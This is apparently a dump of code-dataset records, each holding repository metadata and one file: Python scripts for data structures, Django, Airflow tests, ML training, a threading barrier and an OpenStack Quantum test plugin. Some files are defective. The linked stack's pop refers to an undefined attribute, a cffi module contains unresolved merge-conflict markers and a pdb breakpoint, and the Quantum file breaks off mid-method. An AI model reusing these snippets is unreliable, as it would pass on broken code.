226,782,243
0
0
null
null
null
null
UTF-8
Python
false
false
773
py
""" lstack.py 栈的链式结构 重点代码 思路: 1. 源于节点存储数据,建立节点关联 2. 封装方法 入栈 出栈 栈空 栈顶元素 3. 链表的开头作为栈顶(不需要每次遍历) """ # 自定义异常 class StackError(Exception): pass # 创建节点类 class Node: def __init__(self,val,next=None): self.val = val # 有用数据 self.next = next # 节点关系 # 链式栈 class LStack: def __init__(self): # 标记顶位置 self._top = None def is_empty(self): return self._top is None def push(self,val): node=Node(val) node.next=self._top self._top=node def pop(self): temp=self._top.val self.top=self.top.next return temp
[ "769358744@qq.com" ]
769358744@qq.com
143a773bbbec049d6b12a6406b50a9fce3cdd585
26dec2f8f87a187119336b09d90182d532e9add8
/mcod/resources/documents.py
da3e92fb9c8f6d9a843336fb6541b7e1b3f9d460
[]
no_license
olekstomek/mcod-backend-dane.gov.pl
7008bcd2dbd0dbada7fe535536b02cf27f3fe4fd
090dbf82c57633de9d53530f0c93dddf6b43a23b
refs/heads/source-with-hitory-from-gitlab
2022-09-14T08:09:45.213971
2019-05-31T06:22:11
2019-05-31T06:22:11
242,246,709
0
1
null
2020-02-24T22:39:26
2020-02-21T23:11:50
Python
UTF-8
Python
false
false
2,197
py
from django.apps import apps from django_elasticsearch_dsl import DocType, Index, fields from mcod import settings from mcod.lib.search.fields import TranslatedTextField Resource = apps.get_model('resources', 'Resource') Dataset = apps.get_model('datasets', 'Dataset') TaskResult = apps.get_model('django_celery_results', "TaskResult") INDEX = Index(settings.ELASTICSEARCH_INDEX_NAMES['resources']) INDEX.settings(**settings.ELASTICSEARCH_DSL_INDEX_SETTINGS) data_schema = fields.NestedField(attr='schema', properties={ 'fields': fields.NestedField(properties={ 'name': fields.KeywordField(attr='name'), 'type': fields.KeywordField(attr='type'), 'format': fields.KeywordField(attr='format') }), 'missingValue': fields.KeywordField(attr='missingValue') }) @INDEX.doc_type class ResourceDoc(DocType): id = fields.IntegerField() slug = fields.TextField() uuid = fields.TextField() title = TranslatedTextField('title', common_params={'suggest': fields.CompletionField()}) description = TranslatedTextField('description') file_url = fields.TextField( attr='file_url' ) download_url = fields.TextField( attr='download_url' ) link = fields.TextField() format = fields.KeywordField() file_size = fields.LongField() type = fields.KeywordField() openness_score = fields.IntegerField() dataset = fields.NestedField(properties={ 'id': fields.IntegerField(), 'title': TranslatedTextField('title'), 'slug': TranslatedTextField('slug') }) views_count = fields.IntegerField() downloads_count = fields.IntegerField() status = fields.TextField() modified = fields.DateField() created = fields.DateField() verified = fields.DateField() data_date = fields.DateField() class Meta: doc_type = 'resource' model = Resource related_models = [Dataset, ] def get_instances_from_related(self, related_instance): if isinstance(related_instance, Dataset): return related_instance.resources.all() def get_queryset(self): return self._doc_type.model.objects.filter(status='published')
[ "piotr.zientarski@britenet.com.pl" ]
piotr.zientarski@britenet.com.pl
4668b524700dbf55e3711938e6cfd959affaa864
57ddfddd1e11db649536a8ed6e19bf5312d82d71
/AtCoder/ABC1/ABC123/ABC123-A.py
04402036b76e6ab088ca47d8dcc146c57c639e4d
[]
no_license
pgDora56/ProgrammingContest
f9e7f4bb77714dc5088c2287e641c0aa760d0f04
fdf1ac5d1ad655c73208d98712110a3896b1683d
refs/heads/master
2023-08-11T12:10:40.750151
2021-09-23T11:13:27
2021-09-23T11:13:27
139,927,108
0
0
null
null
null
null
UTF-8
Python
false
false
191
py
sm = float('inf') bi = - float('inf') for _ in range(5): v = int(input()) if v < sm: sm = v if v > bi: bi = v if bi - sm > int(input()): print(':(') else: print('Yay!')
[ "doradora.prog@gmail.com" ]
doradora.prog@gmail.com
d8cd32918e0332ff185300fa7e171a9a68f0cdd3
7ce076dd764fe4b5c7881734f157bc6f77a99ead
/tests/providers/exasol/operators/test_exasol.py
68e3d121b48bccf3971c3dd9c3a0247ac1f8a694
[ "Apache-2.0", "BSD-3-Clause", "MIT", "Python-2.0" ]
permissive
kaxil/airflow
db31c98e23f2e0d869d857484e56a7c58acef231
42f1da179db00491610946a0b089dd82269adc74
refs/heads/master
2023-04-28T04:46:38.478352
2020-09-28T20:51:16
2020-09-28T20:51:16
112,322,392
1
1
Apache-2.0
2020-08-27T20:15:22
2017-11-28T10:42:19
Python
UTF-8
Python
false
false
1,922
py
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import unittest import mock from airflow.providers.exasol.operators.exasol import ExasolOperator class TestExasol(unittest.TestCase): @mock.patch('airflow.providers.exasol.hooks.exasol.ExasolHook.run') def test_overwrite_autocommit(self, mock_run): operator = ExasolOperator(task_id='TEST', sql='SELECT 1', autocommit=True) operator.execute({}) mock_run.assert_called_once_with('SELECT 1', autocommit=True, parameters=None) @mock.patch('airflow.providers.exasol.hooks.exasol.ExasolHook.run') def test_pass_parameters(self, mock_run): operator = ExasolOperator(task_id='TEST', sql='SELECT {value!s}', parameters={'value': 1}) operator.execute({}) mock_run.assert_called_once_with('SELECT {value!s}', autocommit=False, parameters={'value': 1}) @mock.patch('airflow.providers.exasol.operators.exasol.ExasolHook') def test_overwrite_schema(self, mock_hook): operator = ExasolOperator(task_id='TEST', sql='SELECT 1', schema='dummy') operator.execute({}) mock_hook.assert_called_once_with(exasol_conn_id='exasol_default', schema='dummy')
[ "noreply@github.com" ]
noreply@github.com
6f233f3437f6dad2837d92f9c1bdd17ab312e768
b32ab366f637cf28c7235905affb10ef1831472e
/Project_Part2/train.py
067ad4dd1aef1dafd55ccbb244b50318b9be1928
[]
no_license
miloooooz/Information_Retrieval_and_Web_Search
523eaadddb40d060a2384cce2a8819bff9985a2d
a8070d3ac84d095a2c3f61fcc6b204aba3add1a3
refs/heads/master
2021-03-07T02:20:41.758503
2020-03-10T10:46:06
2020-03-10T10:46:06
246,239,799
1
1
null
null
null
null
UTF-8
Python
false
false
1,451
py
## Import Necessary Modules... import pickle from pprint import pprint import project_part2_redo as project_part2 ## Read the data sets... ### Read the Training Data train_file = './Data/train.pickle' train_mentions = pickle.load(open(train_file, 'rb')) ### Read the Training Labels... train_label_file = './Data/train_labels.pickle' train_labels = pickle.load(open(train_label_file, 'rb')) ### Read the Dev Data... (For Final Evaluation, we will replace it with the Test Data) dev_file = './Data/dev.pickle' dev_mentions = pickle.load(open(dev_file, 'rb')) ### Read the Parsed Entity Candidate Pages... fname = './Data/parsed_candidate_entities.pickle' parsed_entity_pages = pickle.load(open(fname, 'rb')) ### Read the Mention docs... mens_docs_file = "./Data/men_docs.pickle" men_docs = pickle.load(open(mens_docs_file, 'rb')) ## Result of the model... result = project_part2.disambiguate_mentions(train_mentions, train_labels, train_mentions, men_docs, parsed_entity_pages) # result ## We will be using the following function to compute the accuracy... def compute_accuracy(result, data_labels): assert set(list(result.keys())) - set(list(data_labels.keys())) == set() TP = 0.0 for id_ in result.keys(): if result[id_] == data_labels[id_]['label']: TP +=1 assert len(result) == len(data_labels) return TP/len(result) accuracy = compute_accuracy(result, train_labels) print("Accuracy = ", accuracy)
[ "zhouruijun0510@hotmail.com" ]
zhouruijun0510@hotmail.com
8c36fc26a272f071d2585e8f26ae41f860d794bf
85381529f7a09d11b2e2491671c2d5e965467ac6
/OJ/Leetcode/Algorithm/54. Spiral Matrix.py
877d512e72cd9a17631f7f49ff7225fae0269c52
[]
no_license
Mr-Phoebe/ACM-ICPC
862a06666d9db622a8eded7607be5eec1b1a4055
baf6b1b7ce3ad1592208377a13f8153a8b942e91
refs/heads/master
2023-04-07T03:46:03.631407
2023-03-19T03:41:05
2023-03-19T03:41:05
46,262,661
19
3
null
null
null
null
UTF-8
Python
false
false
688
py
# -*- coding: utf-8 -*- # @Author: HaonanWu # @Date: 2017-03-03 10:57:26 # @Last Modified by: HaonanWu # @Last Modified time: 2017-03-03 11:01:34 class Solution(object): def spiralOrder(self, matrix): """ :type matrix: List[List[int]] :rtype: List[int] """ ret = [] while matrix: ret += matrix.pop(0) if matrix and matrix[0]: for row in matrix: ret.append(row.pop()) if matrix: ret += matrix.pop()[::-1] if matrix and matrix[0]: for row in matrix[::-1]: ret.append(row.pop(0)) return ret
[ "whn289467822@outlook.com" ]
whn289467822@outlook.com
8e324a32f92a18daf3d929c2bada111d0e6ec1de
89d7bd51638bb3e8ca588062af1a3ec4870efd55
/Tasks/DmitryKozhemyachenok/classwork1/sam.py
67d9756d85b736503f30c388de6595853f0e1a1b
[]
no_license
Kori3a/M-PT1-38-21
9aae9a0dba9c3d1e218ade99f7e969239f33fbd4
2a08cc4ca6166540dc282ffc6103fb7144b1a0cb
refs/heads/main
2023-07-09T20:21:32.146456
2021-08-19T17:49:12
2021-08-19T17:49:12
null
0
0
null
null
null
null
UTF-8
Python
false
false
785
py
import itertools r={"zero": 0, "one": 1, "two": 2, "three": 3, "four": 4, "five": 5, "six": 6, "seven": 7, "eight": 8, "nine": 9, "ten": 10, "eleven": 11, "twelve": 12, "thirteen": 13, "fourteen": 14, "fifteen": 15, "sixteen": 16, "seventeen": 17, "eighteen":18, "nineteen": 19, "twenty": 20} r=[r[i] for i in input().split()] print(r) #избавляемся от повторений и сотрировка r=[r[0]for r in itertools.groupby(sorted(r))] print("без повторений",r) #произведение и сумма for i in range(len(r)-1): if i % 2 == 0: print("проивзедение",r[i]*r[i+1]) else: print("сумма",r[i]+r[i+1]) #сумма всех нечетных print("суммавсех",sum([x for x in r if x%2==1]))
[ "dmitriikozhemyachenok@mail.ru" ]
dmitriikozhemyachenok@mail.ru
55095ee0ea77fe40bd4ed68f53cd486d3d782b2d
fb235cccecab5368074bc43ed8677025f925dceb
/notebooks/westgrid/cffi_practice/__init__.py
6a5ba61abdb1177997fc7a77bffbd803fbab65cb
[]
no_license
sbowman-mitre/parallel_python_course
88a5f767de2f0f630d48faf94983fad51ecbe50f
85b03809c9725c38df85b0ac1e9b34cc50c0dc54
refs/heads/master
2022-01-04T18:29:12.443568
2019-11-29T16:08:06
2019-11-29T16:08:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,313
py
# import version for use by setup.py from ._version import version_info, __version__ # noqa: F401 imported but unused from pathlib import Path import pdb import os import pdb def get_paths(*args, **kwargs): binpath=Path(os.environ['CONDA_PREFIX']) <<<<<<< HEAD libfile= binpath / Path('lib/libcffi_funs.so') libdir= binpath / Path('lib') pdb.set_trace() # # find either libcffi_funs.so or libcffi_funs.dll # library=list(libdir.glob('libcffi_funs.*')) if len(library) > 1: raise ImportError('found more than one libcffi_funs library') try: libfile=library[0] except IndexError: libfile=Path('libcffi_funs') includedir=Path.joinpath(binpath.parent,Path('include')) for the_path in [libfile, libdir, includedir]: if not the_path.exists(): print(f"couldn't find {str(the_path)}. Did you install cffi_funs?") out_dict=None break else: out_dict=dict(libfile=str(libfile),libdir=str(libdir),includedir=str(includedir)) ======= libfile= binpath/ Path('lib/libcffi_funs.so') libdir= binpath / Path('lib') includedir = binpath / Path('include') out_dict=dict(libfile=str(libfile),libdir=str(libdir),includedir=str(includedir)) >>>>>>> checkpoint return out_dict
[ "paustin@eos.ubc.ca" ]
paustin@eos.ubc.ca
b2d1398b1871c9a27671f1b06ceffc99159ba998
21a5a58e19a989a7301c3d658c707608071725b2
/train.py
42396ce06a89820b1dfd94fcc756b4ecc3f91125
[]
no_license
Meneville/fast-weights-test
0787c40de1144166dfab84aecc4f289a1acb984a
1a3e04d504b379263235a8a805dd7049b0a0406a
refs/heads/main
2023-05-31T02:30:37.208511
2021-07-09T12:57:06
2021-07-09T12:57:06
384,435,172
1
0
null
null
null
null
UTF-8
Python
false
false
2,189
py
# --------------------------------------------------------------------------- # 0. import # --------------------------------------------------------------------------- import tensorflow as tf import numpy as np import _pickle as pickle from dataset import DataGenerator from model import fw_rnn_model from utils import * # --------------------------------------------------------------------------- # 1. parameter # --------------------------------------------------------------------------- STEP_NUM = 9 ELEM_NUM = 26 + 10 + 1 BATCH_SZ = 128 HID_NUM = 50 SEED = 7777 MODEL = 'fw_rnn_model' model_path = './checkpoint/' + MODEL log_path = './log/' + MODEL learning_rate = 1e-4 epochs = 1000 reset_seed(SEED) # --------------------------------------------------------------------------- # 2. Create Dataset # --------------------------------------------------------------------------- with open(os.path.join('data', 'train.p'), 'rb') as f: x_train, y_train = pickle.load(f) with open(os.path.join('data', 'valid.p'), 'rb') as f: x_val, y_val = pickle.load(f) train_gen = DataGenerator(x_train, y_train, BATCH_SZ, shuffle=False) val_gen = DataGenerator(x_val, y_val, BATCH_SZ, shuffle=False) # test_gen = DataGenerator(x_test, y_test, BATCH_SZ, shuffle=False) # --------------------------------------------------------------------------- # 3. Train # --------------------------------------------------------------------------- opt = tf.keras.optimizers.Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, clipnorm=0.1) model = eval(MODEL)(BATCH_SZ, STEP_NUM, ELEM_NUM, HID_NUM) model.summary() model.compile(loss={'output': loss_fn}, optimizer=opt, metrics=['accuracy']) checkpoint = tf.keras.callbacks.ModelCheckpoint(model_path, monitor='val_accuracy', verbose=1, save_best_only=True, mode='max', save_weights_only=True) csv_logger = tf.keras.callbacks.CSVLogger(log_path, append=True, separator=',') callbacks_list = [checkpoint, csv_logger] model.fit(train_gen, epochs=epochs, verbose=1, callbacks=callbacks_list, validation_data=val_gen)
[ "chen_qh@zju.edu.cn" ]
chen_qh@zju.edu.cn
aea3a266f96e0e510e291772736803d003de39c4
08c4415606e2a06593c8d837c746d79f6e2645a9
/heart-disease.py
efc62dbf34d98220f689e6ce4b503bd804b3bd26
[]
no_license
vanphuoc9/heart-disease
2f018074f8f7f177f0a125f79af03f70d61d1c6c
713efcfbd1e41ec29364d5e5889da98d76fd5101
refs/heads/master
2020-03-26T11:39:01.224150
2018-09-03T04:26:52
2018-09-03T04:26:52
144,852,615
0
0
null
null
null
null
UTF-8
Python
false
false
1,988
py
import pandas as pd import numpy as np import sklearn from sklearn.preprocessing import Imputer #Tao ra mo hinh xac suat Bayes thong qua thu vien from sklearn.metrics import accuracy_score from sklearn.model_selection import train_test_split # #Tao ra mo hinh xac suat Bayes thong qua thu vien from sklearn.naive_bayes import GaussianNB from sklearn.preprocessing import StandardScaler model = GaussianNB() #Doc du lieu tu file dataset = pd.read_csv("Heart_Disease_Data.csv",na_values="?", low_memory = False) # doi cac gia tri 1, 2, 3, 4 ve 1 dataset["pred_attribute"].replace(inplace=True, value=[1, 1, 1, 1], to_replace=[1, 2, 3, 4]) # # 13 dataset features # feature13 = ['age','sex','cp','trestbps','chol','fbs','restecg','thalach','exang','oldpeak','slop','ca','thal'] # print dataset.isnull().sum() # Load data X = dataset.iloc[:, :-1].values y = dataset.iloc[:, -1].values # = dataset.iloc[:, 13].values my_imputer = Imputer(missing_values='NaN', strategy='mean', axis=0) my_imputer = my_imputer.fit(X[:,0:13]) X[:, 0:13] = my_imputer.transform(X[:, 0:13]) scaler = StandardScaler() X = scaler.fit_transform(X) #Chon du lieu da tach theo nghi thuc hold-out X_train,X_test,y_train,y_test= train_test_split(X,y) # #Xay dung mo hinh Bayes voi 2 tap du lieu X_train va y_train print(X) # # #Thuc hien doan nhan cho tap du lieu X con lai va luu nhan cua chung vao vien thucte de doi chieu # dubao = model.predict(np.array([56,0,2,140,294,0,2,153,0,1.3,2,0,3]).reshape(1,13)) # thucte = y_test # print (dubao) def ReadData(age,sex,cp,trestbps,chol,fbs,restecg,thalach,exang,oldpeak,slop,ca,thal): model.fit(X_train, y_train) dubao = model.predict(np.array([age,sex,cp,trestbps,chol,fbs,restecg,thalach,exang,oldpeak,slop,ca,thal]).reshape(1,13)) return dubao[0] print (ReadData(65,0,4,150,225,0,2,114,0,1,2,3,7)) # print ("Do chinh xac tong the: ",accuracy_score(thucte,dubao)) #### KNN ##to choose the right K we build a loop witch examen all the posible values for K.
[ "thaiphuoc1997@gmail.com" ]
thaiphuoc1997@gmail.com
b4f4e6f565e7d55f59c7f5d9117c3a4e0ea4a4ae
53f733c092e24610d864fa66a2741311b3b31209
/google/cloud/security/common/data_access/forseti_system_dao.py
56807d33a930a37da8a06da90dcb1256c46fbd86
[ "Apache-2.0" ]
permissive
shimizu19691210/forseti-security
a4860e30aa8a097b23d262d7a82fe2bca951a955
a6a1aa7464cda2ad5948e3e8876eb8dded5e2514
refs/heads/master
2021-04-15T06:07:42.110629
2018-03-21T21:40:05
2018-03-21T21:40:05
126,314,876
1
0
Apache-2.0
2018-03-22T09:57:54
2018-03-22T09:57:53
null
UTF-8
Python
false
false
2,279
py
# Copyright 2017 The Forseti Security Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Provides the data access object (DAO) for Forseti system management.""" from google.cloud.security.common.data_access import dao # pylint: disable=line-too-long from google.cloud.security.common.data_access.sql_queries import cleanup_tables_sql from google.cloud.security.common.util import log_util LOGGER = log_util.get_logger(__name__) class ForsetiSystemDao(dao.Dao): """Data access object (DAO) for Forseti system management. Args: global_configs (dict): Global config - used to lookup db_name """ def __init__(self, global_configs=None): dao.Dao.__init__(self, global_configs) self.db_name = global_configs['db_name'] def cleanup_inventory_tables(self, retention_days): """Clean up old inventory tables based on their age Will detect tables based on snapshot start time in snapshot table, and drop tables older than retention_days specified. Args: retention_days (int): Days of inventory tables to retain. """ sql = cleanup_tables_sql.SELECT_SNAPSHOT_TABLES_OLDER_THAN result = self.execute_sql_with_fetch( cleanup_tables_sql.RESOURCE_NAME, sql, [retention_days, self.db_name]) LOGGER.info( 'Found %s tables to clean up that are older than %s days', len(result), retention_days) for row in result: LOGGER.debug('Dropping table: %s', row['table']) self.execute_sql_with_commit( cleanup_tables_sql.RESOURCE_NAME, cleanup_tables_sql.DROP_TABLE.format(row['table']), None)
[ "henryc@google.com" ]
henryc@google.com
a3441c62140e4ceb7659e27c0851434d9ba88215
2272c4d8b34807da78ed419c53bf4325ad8ca289
/Bariera.py
93dd573c989711a63be80a2867949c7d4b793f58
[]
no_license
Konradox/Barrier
c5a26745f909763d364f0edec2cb329ba55e38ff
015f0bef411a73eb561475960e8100751fbc6c30
refs/heads/master
2020-03-27T19:31:16.561492
2015-02-10T21:24:01
2015-02-10T21:24:01
30,615,254
0
0
null
null
null
null
UTF-8
Python
false
false
1,624
py
# -*- coding: utf-8 -*- __author__ = 'Konrad' import threading import time class myThread(threading.Thread): threadCounter = 0 barrierCounter = 0 exitCounter = 0 lock = threading.Lock() cv = threading.Condition(lock) def __enter__(self): return self def __init__(self, threadID, name): threading.Thread.__init__(self) self.threadID = threadID self.name = name with myThread.lock: myThread.threadCounter += 1 def run(self): print(self.name + " is starting.") time.sleep(self.threadID * 2) print(self.name + " is ending.") self.barrier() print(self.name + " - ended") @staticmethod def barrier(): myThread.cv.acquire() myThread.barrierCounter += 1 while myThread.barrierCounter < myThread.threadCounter: myThread.cv.wait() myThread.exitCounter += 1 if myThread.exitCounter >= myThread.threadCounter: myThread.exitCounter = 0 myThread.barrierCounter = 0 myThread.cv.notify_all() myThread.cv.release() def __exit__(self, exc_type, exc_val, exc_tb): with myThread.lock: myThread.threadCounter -= 1 with myThread(1, "Thread 1") as t1, myThread(2, "Thread 2") as t2, myThread(3, "Thread 3") as t3: t1.start() t2.start() t3.start() t1.join() t2.join() t3.join() with myThread(1, "Thread 4") as t1, myThread(2, "Thread 5") as t2, myThread(3, "Thread 6") as t3: t1.start() t2.start() t3.start() t1.join() t2.join() t3.join()
[ "xkonradox@gmail.com" ]
xkonradox@gmail.com
26c80160665467234f7e9f9bac615e1f9a40f3ec
4cc2b3ba7d7b87a57ba1d4c5532426d5c6676bf1
/product/migrations/0002_auto_20210609_1621.py
c9e0653bfda3267fe361ec7c2eeed7d81838c27c
[]
no_license
Bhavesh852/Order
5cba5bb4a02db9fd9d7d2f681bcaa2126c82a3ac
92383e555f5b3fac4549e45ba1510c8355d6e621
refs/heads/master
2023-05-15T05:16:47.297902
2021-06-09T14:11:05
2021-06-09T14:11:05
375,373,577
0
0
null
null
null
null
UTF-8
Python
false
false
981
py
# Generated by Django 3.0.8 on 2021-06-09 10:51 from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('product', '0001_initial'), ] operations = [ migrations.AlterField( model_name='order', name='created_date', field=models.DateTimeField(default=django.utils.timezone.now, editable=False), ), migrations.AlterField( model_name='order', name='total_price', field=models.DecimalField(decimal_places=2, max_digits=10), ), migrations.AlterField( model_name='order', name='unit_price', field=models.DecimalField(decimal_places=2, max_digits=6), ), migrations.AlterField( model_name='product', name='unit_price', field=models.DecimalField(decimal_places=2, max_digits=6), ), ]
[ "bchandora60@gmail.com" ]
bchandora60@gmail.com
34bfcc6b015aa99b68b4193b7ac4abc2d22eca43
46304762aa4dea478008545fcecff88dd56df13e
/build/lib/A22DSE/Parameters/Par_Class_All.py
1dea22730931f0c10b07e4f0c9252d0577681645
[]
no_license
ThomasRV/A22CERES
12551a00be887a68e744523a4c7b548405346b3a
21c1d1889ef402bd23668493a1a4c6acec344f58
refs/heads/master
2020-05-31T11:44:38.858255
2019-06-04T15:00:50
2019-06-04T15:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,375
py
# -*- coding: utf-8 -*- """ Created on Mon May 13 11:37:54 2019 @author: hksam """ #import sys #sys.path.append('../../') #from A22DSE.Models.AnFP.Current.InitialSizing.AnFP_Exec_initsizing import WSandTW #from A22DSE.Models.POPS.Current.cruisecalculations import CruiseRange, CruiseTime #from A22DSE.Models.POPS.Current.cruisecalculations import CruiseRange, CruiseTime class ParAnFPLst(object): def __init__(self): self.A = None #[-] DUMMY VALUE self.e = None #[-] DUMMY VALUE self.CD0 = None #[-] DUMMY VALUE self.S = None #[m_squared] DUMMY VALUE #cruise parameters self.TtoW = None #[-] air to fuel ratio by POPS self.Mdd = None #[-] self.h_cruise = 20000. self.M_cruise = None #[-] DUMMY VALUE cruise mach number by POPS self.s_cruise = None self.V_cruise = None self.t_cruise = None self.CL_cruise = 1.2 #[-] DUMMY VALUE self.CL_max_cruise = 1.5 self.c_j = 0.6/3600 #[s^-1] DUMMY VALUE self.SFC = 16*10e-6 #[kg/N/s] DUMMY VALUE self.LD = 16 #[-] DUMMY VALUE #takeoff parameters self.CL_to = 1.8 #[-] DUMMY VALUE cruise mach number by POPS self.CD_to = 0.1 #[-] DUMMY VALUE cruise mach number by POPS self.fieldlen_to = 2500 #m self.rho_SL = 1.225 #[kg/m3] self.T_to = None #[N] DUMMY self.Vr = 50 #[m/s] DUMMY #landing parameters self.CL_land = 2.8 #[-] DUMMY VALUE self.CD_land = 0.3 #[-] DUMMY VALUE cruise mach number by POPS self.fieldlen_land = 2500 #m def Get_V_cruise(self): return self.s_cruise/self.t_cruise class ParCntrlLst(object): def __init__(self): self.placeholder = None class ParStrucLst(object): def __init__(self): self.MTOW = None #[kg] self.FW = None #[kg] #Fuel weight self.N_engines = 2 #[-] #ratios self.OEWratio = 1/2.47 #[-] self.wfratioclimb = 0.8 class ParPayloadLst(object): def __init__(self): self.disperRatePerTime = None self.airtofuel = 6 #[-] air to fuel ratio by POPS self.m_sulphur = 10000. #[kg] sulphur mass per flight by POPS self.rho_sulphur = 1121 #[kg/m^3] density of solid sulphur by POPS self.rho_alu = 2700 #[kg/m^3] density of aluminium by POPS self.dispersionrate = 8e-3 #[kg/m] class ParCostLst(object): def __init__(self): #Cost parameters self.CEF8919 = 284.5/112.5 #[USD/hr] self.CEF7019 = 284.5/112.5+3.02 #[USD/hr] self.Fmat= 2.25 self.rer = 62 #[USD/hr] CEF00/CEF89 self.rmr = 34 #[USD/hr] CEF00/CEF89 self.rtr = 43 #[USD/hr] CEF00/CEF89 self.Fdiff = 1.5 #[-] self.Fcad = 0.8 #[-] self.Nrdte= 6 #[-] nr of test ac, between 2-8 self.Nst = 2 #[-] nr of static test ac self.Fobs = 1 #[-] self.Fpror = 0.1 #[-] self.Ffinr = 0.05 #[-] self.Ftsf = 0.2 #CHECK VALUE!!!!! self.Cavionics = 30000000 #CHECK VALUE self.Nrr = 0.33 #[-] self.Nprogram = 150 #[-] self.Nrm = 11/12 #[-] self.tpft = 10 #[hrs] self.Fftoh = 4.0 #[-] self.FfinM = 0.10 #[-] class ParConvLst(object): def __init__(self): self.ft2m = 0.3048 #[ft/m] self.lbs2kg = 0.453592 #[lbs/kg] self.mile2m = 1609.34 #[miles/meter] self.gallon2L = 3.78541 #[-] self.kts2ms = 0.514444444 #[-] class ParSensitivityAnalysis(object): def __init__(self): self.N_cont_lines = 10 self.N_colours = 10 self.X_steps = 10 self.Y_steps = 10 class Aircraft(object): def __init__(self): # LOAD ALL classes self.ParPayload = ParPayloadLst() self.ParAnFP = ParAnFPLst() self.ParCntrl = ParCntrlLst() self.ParCostLst = ParCostLst() self.ParStruc = ParStrucLst() self.ConversTool = ParConvLst() self.ParSens = ParSensitivityAnalysis()
[ "noutvdbos@gmail.com" ]
noutvdbos@gmail.com
a3c0fbf2706cd04d397ed4f4e27f4e86f007625e
d302dc1cdb3f514d08cc812529b542da4ec7c2ae
/Prime.py
c48ea98bcbac66c0ea23679b9a4fadf13cb4320c
[]
no_license
Rahan13/CODE_KATA_PLAYER
8f5bcdb429a484e951a11a257139709b8926ae10
7f1e40214a344cc4416f092959f6a7fa514d23fb
refs/heads/master
2020-06-05T10:28:51.237104
2019-07-11T03:23:10
2019-07-11T03:23:10
192,409,548
0
0
null
null
null
null
UTF-8
Python
false
false
144
py
num = int(input()) a = True for i in range(2,num): if num%i ==0: a = False print("yes") break if a: print("no")
[ "noreply@github.com" ]
noreply@github.com
7d7e17f1be39a1bce373f6aa4892368c83bdc96a
693ae5945a34ac9487e40c478a1cabb6f4ef7eb6
/quantum/tests/unit/test_routerserviceinsertion.py
633629f27ecdfca8ce29f30623a22f723f39806d
[ "Apache-2.0" ]
permissive
yy2008/quantum
292f7a5cc1c78ce97ba8b5e6211f7bd6dad2a46a
b590f9dd560978ab8cee2da7bee96f29e2f307f7
refs/heads/master
2021-01-24T00:54:11.916086
2013-02-22T06:16:42
2013-02-22T06:16:42
null
0
0
null
null
null
null
UTF-8
Python
false
false
16,397
py
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2013 VMware, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import unittest2 as unittest import webob.exc as webexc import quantum from quantum.api import extensions from quantum.api.v2 import router from quantum.common import config from quantum.db.loadbalancer import loadbalancer_db as lb_db from quantum.db import db_base_plugin_v2 from quantum.db import l3_db from quantum.db import routedserviceinsertion_db as rsi_db from quantum.db import routerservicetype_db as rst_db from quantum.db import servicetype_db as st_db from quantum.extensions import routedserviceinsertion as rsi from quantum.extensions import routerservicetype as rst from quantum.openstack.common import cfg from quantum.plugins.common import constants from quantum.tests.unit import test_api_v2 from quantum.tests.unit import testlib_api from quantum import wsgi _uuid = test_api_v2._uuid _get_path = test_api_v2._get_path extensions_path = ':'.join(quantum.extensions.__path__) class RouterServiceInsertionTestPlugin( rst_db.RouterServiceTypeDbMixin, rsi_db.RoutedServiceInsertionDbMixin, st_db.ServiceTypeManager, lb_db.LoadBalancerPluginDb, l3_db.L3_NAT_db_mixin, db_base_plugin_v2.QuantumDbPluginV2): supported_extension_aliases = [ "router", "router-service-type", "routed-service-insertion", "service-type", "lbaas" ] def create_router(self, context, router): with context.session.begin(subtransactions=True): r = super(RouterServiceInsertionTestPlugin, self).create_router( context, router) service_type_id = router['router'].get(rst.SERVICE_TYPE_ID) if service_type_id is not None: r[rst.SERVICE_TYPE_ID] = service_type_id self._process_create_router_service_type_id( context, r) return r def get_router(self, context, id, fields=None): with context.session.begin(subtransactions=True): r = super(RouterServiceInsertionTestPlugin, self).get_router( context, id, fields) rsbind = self._get_router_service_type_id_binding(context, id) if rsbind: r[rst.SERVICE_TYPE_ID] = rsbind['service_type_id'] return r def delete_router(self, context, id): with context.session.begin(subtransactions=True): super(RouterServiceInsertionTestPlugin, self).delete_router( context, id) rsbind = self._get_router_service_type_id_binding(context, id) if rsbind: raise Exception('Router service-type binding is not deleted') def create_resource(self, res, context, resource, model): with context.session.begin(subtransactions=True): method_name = "create_{0}".format(res) method = getattr(super(RouterServiceInsertionTestPlugin, self), method_name) o = method(context, resource) router_id = resource[res].get(rsi.ROUTER_ID) if router_id is not None: o[rsi.ROUTER_ID] = router_id self._process_create_resource_router_id( context, o, model) return o def get_resource(self, res, context, id, fields, model): method_name = "get_{0}".format(res) method = getattr(super(RouterServiceInsertionTestPlugin, self), method_name) o = method(context, id, fields) if fields is None or rsi.ROUTER_ID in fields: rsbind = self._get_resource_router_id_binding( context, id, model) if rsbind: o[rsi.ROUTER_ID] = rsbind['router_id'] return o def delete_resource(self, res, context, id, model): method_name = "delete_{0}".format(res) with context.session.begin(subtransactions=True): method = getattr(super(RouterServiceInsertionTestPlugin, self), method_name) method(context, id) 